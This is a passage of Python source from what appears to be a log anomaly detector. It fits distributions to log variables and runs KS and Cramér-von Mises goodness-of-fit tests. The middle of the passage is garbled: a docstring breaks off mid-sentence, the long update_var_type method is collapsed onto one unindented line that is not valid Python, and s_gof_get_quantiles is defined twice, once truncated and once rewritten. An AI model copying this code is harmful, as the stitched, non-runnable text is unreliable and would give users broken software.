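            distribution.append(['beta', ev, sigma,
                                 min_val - self.max_mod_ini_beta2 / (1 - self.max_mod_ini_beta2 - self.min_mod_ini_beta2) * span,
                                 max_val + self.min_mod_ini_beta2 / (1 - self.max_mod_ini_beta2 - self.min_mod_ini_beta2) * span, 3])

            # Test for beta4 distribution (mean of beta(1, 5) is 1/6, so the sample mean is mapped there)
            significance.append(cramervonmises(
                (values - min_val) / (ev - min_val) * (1 / 6 - self.min_mod_ini_beta4) + self.min_mod_ini_beta4,
                'beta', args=(1, 5)) / crit['beta4'])
            distribution.append(['beta', ev, sigma, min_val, max_val, 4])

            # Test for beta5 distribution (mirror image of beta4)
            significance.append(cramervonmises(
                (values - max_val) / (max_val - ev) * (1 / 6 - self.min_mod_ini_beta4) + 1 - self.min_mod_ini_beta4,
                'beta', args=(5, 1)) / crit['beta4'])
            distribution.append(['beta', ev, sigma, min_val, max_val, 5])

            # Check if one of the above tested continuous distribution fits
            if min(significance) <= 1:
                ranked = np.argsort(significance)  # best fit first (smallest statistic / critical value)
                # A shape is an alternative only if it passes its own test, i.e. its ratio is <= 1.
                # (Previously `>= self.gof_alpha`, which compared a statistic ratio against a p-value
                # threshold and therefore also kept the rejected shapes as alternatives.)
                alternatives = [distribution[i] for i in ranked[1:] if significance[i] <= 1]
                return distribution[ranked[0]] + [alternatives]

        if self.use_empiric_distr:
            return ['emp', ev, sigma, []]
        # discrete if no distribution fits
        return ['d']

    def calculate_value_range(self, values):
        """
        Calculate the lower and upper limit of the expected values of a 'range' variable.

        The method is selected by self.used_range_test: 'MeanSD' uses the mean and standard
        deviation of the sample with the normal quantile of range_alpha / 2, 'EmpiricQuantiles'
        widens the observed min/max by their distance to the empiric range_alpha / 2 quantiles,
        and anything else ('MinMax') widens min/max by a fraction of the observed span.
        self.range_limits_factor stretches the widening in all three cases. The caller's list is
        left untouched (a sorted copy is used where ordering is needed).

        values: non-empty list of numbers.
        Returns ['range', lower_limit, upper_limit, 0]; the trailing 0 is the update counter that
        update_var_type increments on every check.
        """
        if self.used_range_test == 'MeanSD':
            # Calculate the mean and standard deviation of the test sample
            [ev, sigma] = norm.fit(values)
            # norm.ppf(range_alpha / 2) is negative for alpha < 1, so ev_dist < 0: adding it to ev
            # gives the lower limit and subtracting it the upper limit.
            ev_dist = sigma * norm.ppf(self.range_alpha / 2)
            lower_limit = ev + ev_dist * self.range_limits_factor
            upper_limit = ev - ev_dist * self.range_limits_factor
            return ['range', lower_limit, upper_limit, 0]

        # Both empiric variants work on the ordered sample; sort a copy instead of the caller's list.
        ordered = sorted(values)
        if self.used_range_test == 'EmpiricQuantiles':
            # Offset of the range_alpha / 2 quantile from either end of the ordered sample
            quantile_index = int(len(ordered) * (0.5 - self.range_alpha / 2) + 0.5)
            lower_limit = ordered[0] - (ordered[quantile_index] - ordered[0]) * self.range_limits_factor
            upper_limit = ordered[-1] - (ordered[-1 - quantile_index] - ordered[-1]) * self.range_limits_factor
        else:  # self.used_range_test == 'MinMax'
            widening = (ordered[-1] - ordered[0]) * (0.5 - self.range_alpha / 2) * self.range_limits_factor
            lower_limit = ordered[0] - widening
            upper_limit = ordered[-1] + widening
        return ['range', lower_limit, upper_limit, 0]

    def update_var_type(self, event_index, var_index, log_atom):
        """Test if the new num_update values fit the detected var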
type if the test fails.""" # Getting the new values and saving the old distribution for printing-purposes if the test fails new_values = self.event_type_detector.values[event_index][var_index][-self.num_update:] VT_old = copy.deepcopy(self.var_type[event_index][var_index]) # Test and update for continuous distribution if self.var_type[event_index][var_index][0] in self.distr_list: if not consists_of_floats(new_values): # A value is not a float or integer, so the new assigned type is others # Values do not follow a specific pattern self.var_type[event_index][var_index] = ['others', 0] self.distr_val[event_index][var_index] = [] self.bt_results[event_index][var_index] = [] self.print_changed_var_type(event_index, VT_old, ['others'], var_index, log_atom, 1.0) return # first_distr is used to test the current distribution with the BT and to discard the alternative distributions if they # fail the s_gof-test once first_distr = True s_gof_result = self.s_gof_test(event_index, var_index, first_distr) # Calculate the confidence as the stretched sigmaoid function of the maximal value of the step fct # 1 / (1 + np.exp(-2)) = 1.1353352832366128 confidence = 1 / (1 + np.exp(-2 * s_gof_result[1])) * 1.1353352832366128 while not s_gof_result[0]: # If the test fails a new shape is searched for in the alternative distributions self.bt_results[event_index][var_index] = self.bt_results[event_index][var_index][1:] + [0] # Update the results of the BT first_distr = False # Check if the BT is applicable and if it holds if first_distr and (sum(self.bt_results[event_index][var_index]) >= self.s_gof_bt_min_success): return if not self.learn_mode: # Do not update variable type self.bt_results[event_index][var_index] = [1] * self.num_s_gof_bt self.print_reject_var_type(event_index, self.var_type[event_index][var_index], var_index, log_atom) self.var_type_history_list[event_index][var_index][0][-1] = 1 return if len(self.alternative_distribution_types[event_index][var_index]) != 0: # There is 
at least one alternative distribution # Initializes the distributionvalues and bucketnumbers self.var_type[event_index][var_index] = self.alternative_distribution_types[event_index][var_index][0] self.alternative_distribution_types[event_index][var_index] = self.alternative_distribution_types[event_index][ var_index][1:] self.bt_results[event_index][var_index] = [1] * self.num_s_gof_bt if self.var_type[event_index][var_index][0] in ('betam', 'spec'): self.s_gof_get_quantiles(event_index, var_index) s_gof_result = self.s_gof_test(event_index, var_index, first_distr) # There is no alternative distribution. The var type is set to others else: # Values do not follow a specific pattern self.var_type[event_index][var_index] = ['others', 0] self.distr_val[event_index][var_index] = [] self.bt_results[event_index][var_index] = [] self.print_changed_var_type(event_index, VT_old, ['others'], var_index, log_atom, confidence) return # Check if the s_gof_test was successful and remark the success if first_distr: self.bt_results[event_index][var_index] = self.bt_results[event_index][var_index][1:] + [1] # Print a message if the vartype has changed if VT_old != self.var_type[event_index][var_index]: self.print_changed_var_type(event_index, VT_old, self.var_type[event_index][var_index], var_index, log_atom, confidence) # Test and update if the values are in the specified range elif self.var_type[event_index][var_index][0] == 'range': self.var_type[event_index][var_index][3] += 1 # Check if the sum of distances of all values outside the defined limits is greater than range_threshold times the range of # the limits if sum(max(0, val - self.var_type[event_index][var_index][2]) for val in self.event_type_detector.values[event_index][var_index][-self.num_update:]) +\ sum(max(0, self.var_type[event_index][var_index][1] - val) for val in self.event_type_detector.values[event_index][var_index][-self.num_update:]) >\ self.range_threshold * (self.var_type[event_index][var_index][2] - 
self.var_type[event_index][var_index][1]): # Do not update variable type if not self.learn_mode: self.print_reject_var_type(event_index, self.var_type[event_index][var_index], var_index, log_atom) self.var_type_history_list[event_index][var_index][0][-1] = 1 return # Values do not follow a specific pattern self.var_type[event_index][var_index] = ['others', 0] self.print_changed_var_type(event_index, VT_old, ['others'], var_index, log_atom) # Reset counter if at least one value lies outside of the limits elif any(max(0, val - self.var_type[event_index][var_index][2]) for val in self.event_type_detector.values[event_index][var_index][-self.num_update:]) or\ any(max(0, self.var_type[event_index][var_index][1] - val) for val in self.event_type_detector.values[event_index][var_index][-self.num_update:]): self.var_type[event_index][var_index][3] = 1 # Reinitialize the range limits if no value was outside of the range in the last num_reinit_range update steps elif self.learn_mode and self.num_reinit_range != 0 and\ self.var_type[event_index][var_index][3] % self.num_reinit_range == 0: self.var_type[event_index][var_index] = self.calculate_value_range( self.event_type_detector.values[event_index][var_index][-self.num_update:]) if self.stop_learning_timestamp is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_timestamp = time.time() + self.stop_learning_no_anomaly_time # Test and update for ascending values elif self.var_type[event_index][var_index][0] == 'asc': # Search for a not ascending sequence in the values for j in range(-self.num_update, 0): if self.event_type_detector.values[event_index][var_index][j - 1] >\ self.event_type_detector.values[event_index][var_index][j]: # Do not update variable type if not self.learn_mode: self.print_reject_var_type(event_index, self.var_type[event_index][var_index], var_index, log_atom) self.var_type_history_list[event_index][var_index][0][-1] = 1 return # Values do not follow a specific pattern 
self.var_type[event_index][var_index] = ['others', 0] self.print_changed_var_type(event_index, VT_old, ['others'], var_index, log_atom) return elif self.var_type[event_index][var_index][0] == 'desc': # Test and update for descending values for j in range(-self.num_update, 0): # Search for a not ascending sequence in the values if self.event_type_detector.values[event_index][var_index][j - 1] <\ self.event_type_detector.values[event_index][var_index][j]: if not self.learn_mode: # Do not update variable type self.print_reject_var_type(event_index, self.var_type[event_index][var_index], var_index, log_atom) self.var_type_history_list[event_index][var_index][0][-1] = 1 return # Values do not follow a specific pattern self.var_type[event_index][var_index] = ['others', 0] self.print_changed_var_type(event_index, VT_old, ['others'], var_index, log_atom) return elif self.var_type[event_index][var_index][0] == 'd': # Test and update for values of the discrete type # Check if new values have appeared if len(set(new_values + self.var_type[event_index][var_index][1])) > len(self.var_type[event_index][var_index][1]): # New values have appeared # Test if vartype others if len(set(new_values + self.var_type[event_index][var_index][1])) >= ( self.num_update + self.var_type[event_index][var_index][3]) * (1 - self.sim_thres): # Do not update variable type if not self.learn_mode: self.print_reject_var_type(event_index, self.var_type[event_index][var_index], var_index, log_atom) self.var_type_history_list[event_index][var_index][0][-1] = 1 return # Values do not follow a specific pattern self.var_type[event_index][var_index] = ['others', 0] self.print_changed_var_type(event_index, VT_old, ['others'], var_index, log_atom) return # Do not update variable type if not self.learn_mode: self.print_reject_var_type(event_index, self.var_type[event_index][var_index], var_index, log_atom) self.var_type_history_list[event_index][var_index][2][1][-1] = 1 return # Create the new value-set and 
expands the occurrence-list for the new values new_values_set = list(set(self.event_type_detector.values[event_index][var_index][-self.num_update:])) for val in new_values_set: if val not in self.var_type[event_index][var_index][1]: self.var_type[event_index][var_index][1].append(val) self.var_type[event_index][var_index][2].append(0) # update the occurrences # List for the appearances of the new values values_app = [0] * len(self.var_type[event_index][var_index][1]) for i in range(-self.num_update, 0): values_app[self.var_type[event_index][var_index][1].index( self.event_type_detector.values[event_index][var_index][i])] += 1 tmp_number = self.var_type[event_index][var_index][3] / ( self.num_update + self.var_type[event_index][var_index][3]) # Updates the appearance-list in the var type of the discrete variable for j, val in enumerate(self.var_type[event_index][var_index][2]): self.var_type[event_index][var_index][2][j] = \ val * tmp_number + values_app[j] / (self.num_update + self.var_type[event_index][var_index][3]) self.var_type[event_index][var_index][3] = self.num_update + self.var_type[event_index][var_index][3] self.d_init_bt(event_index, var_index) self.print_changed_var_type(event_index, VT_old, self.var_type[event_index][var_index], var_index, log_atom) self.var_type_history_list[event_index][var_index][2][1][-1] = 1 return # No new values have appeared, so the normal test for discrete variables is used self.d_test(event_index, var_index) # Check if the values should be considered others or if the BT failed if (len(set(new_values + self.var_type[event_index][var_index][1])) >= ( self.num_update + self.var_type[event_index][var_index][3]) * (1 - self.sim_thres)) or (sum( self.bt_results[event_index][var_index][0]) < self.d_bt_min_success): # Do not update variable type if not self.learn_mode: self.print_reject_var_type(event_index, self.var_type[event_index][var_index], var_index, log_atom) self.bt_results[event_index][var_index][0] = [1] * self.num_d_bt 
self.var_type_history_list[event_index][var_index][0][-1] = 1 return # Values do not follow a specific pattern self.var_type[event_index][var_index] = ['others', 0] self.print_changed_var_type(event_index, VT_old, ['others'], var_index, log_atom) return # Update the probabilities of the discrete values if self.learn_mode and self.bt_results[event_index][var_index][0][-1]: # List for the number of appearance of the values values_app = [0 for x in range(len(self.var_type[event_index][var_index][1]))] for val in new_values: values_app[self.var_type[event_index][var_index][1].index(val)] += 1 tmp_number = self.var_type[event_index][var_index][3] / ( self.num_update + self.var_type[event_index][var_index][3]) # Updates the appearance-list in the var type of the discrete variable for j, val in enumerate(self.var_type[event_index][var_index][2]): self.var_type[event_index][var_index][2][j] = \ val * tmp_number + values_app[j] / (self.num_update + self.var_type[event_index][var_index][3]) self.var_type[event_index][var_index][3] = self.num_update + self.var_type[event_index][var_index][3] # Check if the discrete distribution has to be updated if ((self.var_type[event_index][var_index][3] - self.num_init) % self.num_pause_discrete) == 0: self.d_init_bt(event_index, var_index) if self.stop_learning_timestamp is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_timestamp = time.time() + self.stop_learning_no_anomaly_time return # Test and update for static variables if self.var_type[event_index][var_index][0] == 'stat': # Check if still static if all(new_values[i] == self.event_type_detector.values[event_index][var_index][0] for i in range(self.num_update)): if self.var_type[event_index][var_index][2] and self.num_stat_stop_update is True and \ self.event_type_detector.num_event_lines[event_index] >= self.num_stat_stop_update: self.event_type_detector.check_variables[event_index][var_index] = False 
self.event_type_detector.values[event_index][var_index] = [] self.var_type[event_index][var_index] = [] self.var_type_history_list[event_index][var_index] = [] if len(self.var_type_history_list_reference) > event_index and len(self.var_type_history_list_reference[event_index]) >\ var_index: self.var_type_history_list_reference[event_index][var_index] = [] affected_path = self.event_type_detector.variable_key_list[event_index][var_index] self.print(f'Stopped tracking the variable of event type {self.event_type_detector.get_event_type(event_index)} with' f' Path:\n{affected_path}\nbecause of its static values.', log_atom, affected_path, confidence=1 - 1 / self.num_stat_stop_update) return # Do not update variable type if not self.learn_mode: self.print_reject_var_type(event_index, self.var_type[event_index][var_index], var_index, log_atom) self.var_type_history_list[event_index][var_index][0][-1] = 1 return # Check if new values appear to be of type others if len(set(new_values)) >= self.num_update * (1 - self.sim_thres) and self.num_update >= 3: # Values do not follow a specific pattern self.var_type[event_index][var_index] = ['others', 0] self.print_changed_var_type(event_index, VT_old, ['others'], var_index, log_atom) return # Change the var type from static to discrete # list of the values values_set = list(set(self.event_type_detector.values[event_index][var_index][-self.num_init:])) # List to store the appearance of the values values_app = [0 for _ in range(len(values_set))] for j in range(-self.num_init, 0): values_app[values_set.index(self.event_type_detector.values[event_index][var_index][j])] += 1 values_app = [x / self.num_init for x in values_app] # Values follow a discrete pattern self.var_type[event_index][var_index] = ['d', values_set, values_app, self.num_init] self.d_init_bt(event_index, var_index) self.print_changed_var_type(event_index, VT_old, self.var_type[event_index][var_index], var_index, log_atom) return # Test and update for unique values if 
self.var_type[event_index][var_index][0] == 'unq': # Check if the new values are not unique if len(set(self.event_type_detector.values[event_index][var_index][-self.num_update:])) != self.num_update: if not self.learn_mode: # Do not update variable type self.print_reject_var_type(event_index, self.var_type[event_index][var_index], var_index, log_atom) self.var_type_history_list[event_index][var_index][0][-1] = 1 return self.var_type[event_index][var_index] = ['others', 0] self.print_changed_var_type(event_index, VT_old, ['others'], var_index, log_atom) return # Check if one of the new values has appeared in the last self.num_update_unq values for j in self.event_type_detector.values[event_index][var_index][-self.num_update:]: if j in self.event_type_detector.values[event_index][var_index][ -self.num_update_unq - self.num_update:-self.num_update]: # Do not update variable type if not self.learn_mode: self.print_reject_var_type(event_index, self.var_type[event_index][var_index], var_index, log_atom) self.var_type_history_list[event_index][var_index][0][-1] = 1 return self.var_type[event_index][var_index] = ['others', 0] self.print_changed_var_type(event_index, VT_old, ['others'], var_index, log_atom) return return # Update for var type others if self.var_type[event_index][var_index][0] == 'others': # Do not update variable type if not self.learn_mode: return # Check if it has passed enough time, to check if the values have a new var_type if (self.var_type[event_index][var_index][1] + 1) % (self.num_pause_others + 1) == 0: # Added a exponential waiting time to avoid redundant tests if not consists_of_ints([np.log2((self.var_type[event_index][var_index][1] + 1) / (self.num_pause_others + 1))]): self.var_type[event_index][var_index][1] += 1 return # Checking for a new var_type vt_new = self.detect_var_type(event_index, var_index) # Only increase the number of skipped update-cycles if vt_new[0] == 'others': self.var_type[event_index][var_index][1] += 1 return # The 
variable gets assigned a new var_type # VarType is empiric distribution if vt_new[0] == 'emp': self.var_type[event_index][var_index] = vt_new self.bt_results[event_index][var_index] = [1] * self.num_s_gof_bt self.s_gof_get_quantiles(event_index, var_index) # VarType is a continuous distribution elif vt_new[0] in self.distr_list: self.var_type[event_index][var_index] = vt_new[:-1] self.alternative_distribution_types[event_index][var_index] = vt_new[-1] self.bt_results[event_index][var_index] = [1] * self.num_s_gof_bt if self.var_type[event_index][var_index][0] in ('betam', 'spec'): self.s_gof_get_quantiles(event_index, var_index) # VarType is discrete elif vt_new[0] == 'd': self.var_type[event_index][var_index] = vt_new self.d_init_bt(event_index, var_index) else: self.var_type[event_index][var_index] = vt_new self.print_changed_var_type(event_index, ['others'], vt_new, var_index, log_atom) else: self.var_type[event_index][var_index][1] += 1 def s_gof_get_quantiles(self, event_index, var_index): """Generate the needed quantiles of the distribution for the sliding gof-test.""" if self.var_type[event_index][var_index][0] == 'emp': # Get a list of almost equidistant indices indices = [int(i) for i in [self.num_init * j / (2 * self.num_s_gof_values) for j in range(2 * self.num_s_gof_values)]] # Get the list of values and sort them sorted_values = copy.copy(self.event_type_detector.values[event_index][var_index][-self.num_init:]) sorted_values.sort() # Generate the list of distribution values distr_val = [] for index in indices: distr_val.append(sorted_values[index]) self.distr_val[event_index][var_index] = distr_val return # Calculate the quantiles of the special distribution if self.var_type[event_index][var_index][0] == 'spec': ev = self.var_type[event_index][var_index][1] sigma = self.var_type[event_index][var_index][2] indices = 0 + np.array(range(2 * self.num_s_gof_values)) / (2 * self.num_s_gof_values - 1) * ( 1000 - 1) indices = indices.astype(int) # Generate the 
    def s_gof_get_quantiles(self, event_index, var_index):
        """
        Generate the quantiles the sliding gof-test compares new values against.

        The quantiles are written to self.distr_val[event_index][var_index]; nothing is returned.
        Only the var types 'emp', 'spec' and 'betam' are handled, any other type leaves distr_val untouched.
        @param event_index index of the event type.
        @param var_index index of the variable within the event type.
        """
        var_type = self.var_type[event_index][var_index]
        num_quantiles = 2 * self.num_s_gof_values

        if var_type[0] == 'emp':
            # Empirical distribution: take almost equidistant order statistics of the last num_init values.
            sorted_values = sorted(self.event_type_detector.values[event_index][var_index][-self.num_init:])
            positions = [int(self.num_init * j / num_quantiles) for j in range(num_quantiles)]
            self.distr_val[event_index][var_index] = [sorted_values[pos] for pos in positions]
            return

        if var_type[0] == 'spec':
            # Special distribution: pick num_quantiles of the 1000 standardised quantiles and rescale them
            # with the sigma and ev stored in the var type.
            ev = var_type[1]
            sigma = var_type[2]
            positions = (np.array(range(num_quantiles)) / (num_quantiles - 1) * (1000 - 1)).astype(int)
            self.distr_val[event_index][var_index] = self.quantiles['spec'][positions] * sigma + ev
            return

        if var_type[0] == 'betam':
            # Mixed beta distribution: a 'proportion' share of the standardised quantiles comes from the first
            # beta component, the remaining indices from the second; both are rescaled with scale and min_val.
            min_val = var_type[1]
            scale = var_type[2]
            proportion = var_type[5]
            positions1 = [int(round(i / proportion)) for i in range(int(round(1000 * proportion)))]
            positions2 = [i for i in range(1000) if i not in positions1]
            mixed_quantiles = np.append(
                self.quantiles['betam1'][positions1] * scale + min_val,
                self.quantiles['betam2'][positions2] * scale + min_val)
            mixed_quantiles.sort()
            self.distr_val[event_index][var_index] = mixed_quantiles
    def s_gof_test(self, event_index, var_index, first_distr):
        """
        Make a gof-test.

        The test compares the last self.num_s_gof_values values of the variable against the distribution stored in
        self.var_type[event_index][var_index]. Which test is used depends on self.used_gof_test ('KS' or anything else,
        which is treated as 'CM').
        @param event_index index of the event type.
        @param var_index index of the variable within the event type.
        @param first_distr if True the second return entry is the actual test statistic, otherwise it is 1.0 on failure
        and 0.0 on success.
        @return a list with the first entry True/False and as the second entry the maximal value of the step functions
        """
        num_distr_val = 2 * self.num_s_gof_values
        if self.used_gof_test == 'KS':
            # Calculate the critical value for the KS-test
            # The parameters are in the list of the critical values
            distribution = self.var_type[event_index][var_index][0]
            if distribution == 'beta':
                # The last entry of a beta var type selects one of the five supported beta shapes
                distribution += str(self.var_type[event_index][var_index][-1])
            if self.s_gof_alpha in self.crit_val_upd_ks and self.num_init in self.crit_val_upd_ks[self.s_gof_alpha] \
                    and self.num_s_gof_values in self.crit_val_upd_ks[self.s_gof_alpha][self.num_init] \
                    and distribution in self.crit_val_upd_ks[self.s_gof_alpha][self.num_init][self.num_s_gof_values]:
                crit_value = \
                    self.crit_val_upd_ks[self.s_gof_alpha][self.num_init][self.num_s_gof_values][distribution]
            else:
                # No tabulated value: fall back to the analytic two-sample KS critical value
                crit_value = ((num_distr_val + self.num_s_gof_values) * (np.log(2 / self.s_gof_alpha)) / (
                    2 * num_distr_val * self.num_s_gof_values)) ** (1 / 2)
            test_statistic = 0
            # Scipy KS-test for uniformal distribution
            # NOTE(review): the 'uni' var type stores [min, max]; kstest's 'uniform' takes (loc, scale), hence max - min.
            if self.var_type[event_index][var_index][0] == 'uni':
                test_statistic = kstest(
                    self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:], 'uniform',
                    args=(self.var_type[event_index][var_index][1], self.var_type[event_index][var_index][2]-self.var_type[event_index][
                        var_index][1]))[0]
            # Scipy KS-test for normal distribution
            elif self.var_type[event_index][var_index][0] == 'nor':
                test_statistic = kstest(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:], 'norm', args=(
                    self.var_type[event_index][var_index][1], self.var_type[event_index][var_index][2]))[0]
            # Scipy KS-test for beta distributions
            elif self.var_type[event_index][var_index][0] == 'beta':
                if self.var_type[event_index][var_index][5] == 1:
                    # Shape 1: symmetric beta(0.5, 0.5) on [var_type[3], var_type[4]]
                    test_statistic = kstest(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:], 'beta', args=(
                        0.5, 0.5, self.var_type[event_index][var_index][3], self.var_type[event_index][var_index][4] - self.var_type[
                            event_index][var_index][3]))[0]
                elif self.var_type[event_index][var_index][5] == 2:
                    # Mu and sigma of the desired distribution
                    # (mean and standard deviation of the standard beta(5, 2); loc/scale are derived from var_type's ev/sigma)
                    [mu, sigma] = [5 / (5 + 2), pow(5 * 2 / (5 + 2 + 1), 1 / 2) / (5 + 2)]
                    test_statistic = kstest(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:], 'beta', args=(
                        5, 2, self.var_type[event_index][var_index][1] - mu * self.var_type[event_index][var_index][2] / sigma,
                        self.var_type[event_index][var_index][2] / sigma))[0]
                elif self.var_type[event_index][var_index][5] == 3:
                    # Mu and sigma of the desired distribution (standard beta(2, 5))
                    [mu, sigma] = [2 / (5 + 2), pow(5 * 2 / (5 + 2 + 1), 1 / 2) / (5 + 2)]
                    test_statistic = kstest(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:], 'beta', args=(
                        2, 5, self.var_type[event_index][var_index][1] - mu * self.var_type[event_index][var_index][2] / sigma,
                        self.var_type[event_index][var_index][2] / sigma))[0]
                elif self.var_type[event_index][var_index][5] == 4:
                    # Mu and sigma of the desired distribution (standard beta(1, 5))
                    [mu, sigma] = [1 / (5 + 1), pow(5 * 1 / (5 + 1 + 1), 1 / 2) / (5 + 1)]
                    test_statistic = kstest(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:], 'beta', args=(
                        1, 5, self.var_type[event_index][var_index][1] - mu * self.var_type[event_index][var_index][2] / sigma,
                        self.var_type[event_index][var_index][2] / sigma))[0]
                elif self.var_type[event_index][var_index][5] == 5:
                    # Mu and sigma of the desired distribution (standard beta(5, 1))
                    [mu, sigma] = [5 / (5 + 1), pow(5 * 1 / (5 + 1 + 1), 1 / 2) / (5 + 1)]
                    test_statistic = kstest(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:], 'beta', args=(
                        5, 1, self.var_type[event_index][var_index][1] - mu * self.var_type[event_index][var_index][2] / sigma,
                        self.var_type[event_index][var_index][2] / sigma))[0]
            else:
                # Any other var type is compared against the stored quantiles with a two-sample KS-test
                test_statistic = ks_2samp(self.distr_val[event_index][var_index], self.event_type_detector.values[event_index][var_index][
                    -self.num_s_gof_values:])[0]
            if first_distr:
                if test_statistic > crit_value:
                    return [False, test_statistic]
                return [True, test_statistic]
            if test_statistic > crit_value:
                return [False, 1.0]
            return [True, 0.0]

        # Else self.used_gof_test == 'CM'
        # Calculate the critical value for the CM-test
        # The parameters are in the list of the critical values
        # NOTE(review): unlike the KS branch, these lookups are not guarded; a missing alpha/num_init/num_s_gof_values
        # key raises KeyError here.
        distribution = self.var_type[event_index][var_index][0]
        if distribution == 'beta':
            distribution += str(self.var_type[event_index][var_index][-1])
        if distribution in ['uni', 'nor', 'beta1']:
            crit_value = self.crit_val_upd_cm[self.s_gof_alpha][self.num_init][self.num_s_gof_values][distribution]
        elif distribution in ['beta2', 'beta3']:
            # beta3 is the mirror image of beta2 and shares its critical value
            crit_value = self.crit_val_upd_cm[self.s_gof_alpha][self.num_init][self.num_s_gof_values]['beta2']
        elif distribution in ['beta4', 'beta5']:
            # beta5 is the mirror image of beta4 and shares its critical value
            crit_value = self.crit_val_upd_cm[self.s_gof_alpha][self.num_init][self.num_s_gof_values]['beta4']
        else:
            crit_value = self.crit_val_hom_cm[self.s_gof_alpha][max(self.num_init, self.num_s_gof_values)][
                min(self.num_init, self.num_s_gof_values)]
        test_statistic = 0
        # NOTE(review): cramervonmises / cramervonmises2 below are compared with crit_value as plain numbers, so they are
        # presumably module-level helpers returning a float rather than scipy.stats.cramervonmises (which returns a result
        # object) - confirm against the module's imports.
        # Two sample CM-test for uniformal distribution
        if self.var_type[event_index][var_index][0] == 'uni':
            min_val = min(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:])
            max_val = max(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:])
            # Widen the observed [min, max] by the configured margins to estimate the support of the new values
            min_upd = min_val - self.min_mod_upd_uni / (1-self.min_mod_upd_uni-self.max_mod_upd_uni) * (max_val-min_val)
            max_upd = max_val + self.max_mod_upd_uni / (1-self.min_mod_upd_uni-self.max_mod_upd_uni) * (max_val-min_val)
            # Check if the estimated min and max differ more than the critical distance and return a negative test result
            # NOTE(review): divides by var_type[2] - var_type[1]; a degenerate 'uni' type with equal bounds would raise
            # ZeroDivisionError here.
            if abs(self.var_type[event_index][var_index][1] - min_upd) / (
                    self.var_type[event_index][var_index][2] - self.var_type[event_index][var_index][1]) +\
                    abs(self.var_type[event_index][var_index][2] - max_upd) / (
                    self.var_type[event_index][var_index][2] - self.var_type[event_index][var_index][1]) >\
                    self.crit_dist_upd_cm[self.s_gof_alpha][self.num_init][self.num_s_gof_values][distribution]:
                return [False, 1]
            estimated_min = min(self.var_type[event_index][var_index][1], min_upd)
            estimated_max = max(self.var_type[event_index][var_index][2], max_upd)
            # Values are mapped onto [0, 1] before testing against the standard uniform distribution
            test_statistic = cramervonmises((np.array(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) -
                                             estimated_min) / (estimated_max - estimated_min), 'uniform')
        # Two sample CM-test for normal distribution
        elif self.var_type[event_index][var_index][0] == 'nor':
            test_statistic = cramervonmises(np.array(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]), 'norm',
                                            args=(self.var_type[event_index][var_index][1], self.var_type[event_index][var_index][2]))
        # Two sample CM-test for beta distributions
        elif self.var_type[event_index][var_index][0] == 'beta':
            if self.var_type[event_index][var_index][5] == 1:
                min_val = min(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:])
                max_val = max(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:])
                min_upd = min_val - self.min_mod_upd_beta1 / (1-self.min_mod_upd_beta1-self.max_mod_upd_beta1) * (max_val-min_val)
                max_upd = max_val + self.max_mod_upd_beta1 / (1-self.min_mod_upd_beta1-self.max_mod_upd_beta1) * (max_val-min_val)
                # Check if the estimated min and max differ more than the critical distance and return a negative test result
                if abs(self.var_type[event_index][var_index][3] - min_upd) / (
                        self.var_type[event_index][var_index][4] - self.var_type[event_index][var_index][3]) +\
                        abs(self.var_type[event_index][var_index][4] - max_upd) / (
                        self.var_type[event_index][var_index][4] - self.var_type[event_index][var_index][3]) >\
                        self.crit_dist_upd_cm[self.s_gof_alpha][self.num_init][self.num_s_gof_values][distribution]:
                    return [False, 1]
                estimated_min = min(self.var_type[event_index][var_index][3], min_upd)
                estimated_max = max(self.var_type[event_index][var_index][4], max_upd)
                test_statistic = cramervonmises((np.array(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) -
                                                 estimated_min) / (estimated_max - estimated_min), 'beta', args=(0.5, 0.5))
            elif self.var_type[event_index][var_index][5] == 2:
                min_val = min(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:])
                max_val = max(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:])
                min_upd = min_val - self.min_mod_upd_beta2 / (1-self.max_mod_upd_beta2-self.min_mod_upd_beta2) * (max_val-min_val)
                max_upd = max_val + self.max_mod_upd_beta2 / (1-self.max_mod_upd_beta2-self.min_mod_upd_beta2) * (max_val-min_val)
                # Check if the estimated min and max differ more than the critical distance and return a negative test result
                if abs(self.var_type[event_index][var_index][3] - min_upd) / (
                        self.var_type[event_index][var_index][4] - self.var_type[event_index][var_index][3]) +\
                        abs(self.var_type[event_index][var_index][4] - max_upd) / (
                        self.var_type[event_index][var_index][4] - self.var_type[event_index][var_index][3]) >\
                        self.crit_dist_upd_cm[self.s_gof_alpha][self.num_init][self.num_s_gof_values]['beta2']:
                    return [False, 1]
                estimated_min = min(self.var_type[event_index][var_index][3], min_upd)
                estimated_max = max(self.var_type[event_index][var_index][4], max_upd)
                test_statistic = cramervonmises((np.array(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) -
                                                 estimated_min) / (estimated_max - estimated_min), 'beta', args=(5, 2))
            elif self.var_type[event_index][var_index][5] == 3:
                min_val = min(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:])
                max_val = max(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:])
                # Mirror image of shape 2: the min/max margins of beta2 are swapped on purpose
                min_upd = min_val - self.max_mod_upd_beta2 / (1-self.max_mod_upd_beta2-self.min_mod_upd_beta2) * (max_val-min_val)
                max_upd = max_val + self.min_mod_upd_beta2 / (1-self.max_mod_upd_beta2-self.min_mod_upd_beta2) * (max_val-min_val)
                # Check if the estimated min and max differ more than the critical distance and return a negative test result
                if abs(self.var_type[event_index][var_index][3] - min_upd) / (
                        self.var_type[event_index][var_index][4] - self.var_type[event_index][var_index][3]) +\
                        abs(self.var_type[event_index][var_index][4] - max_upd) / (
